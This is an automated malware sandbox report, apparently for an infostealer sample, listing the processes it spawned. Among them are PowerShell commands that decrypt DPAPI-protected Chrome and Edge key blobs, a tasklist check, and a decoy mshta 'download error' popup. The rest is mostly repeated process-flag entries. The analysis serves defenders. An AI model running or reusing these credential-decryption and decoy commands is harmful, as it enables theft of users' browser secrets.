Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1636 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist" |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser')" |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser')" |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --mojo-platform-channel-handle=2076 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"" |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2480 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser') |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser') |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\mshta.exe mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()" |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\conhost.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\conhost.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\conhost.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\conhost.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
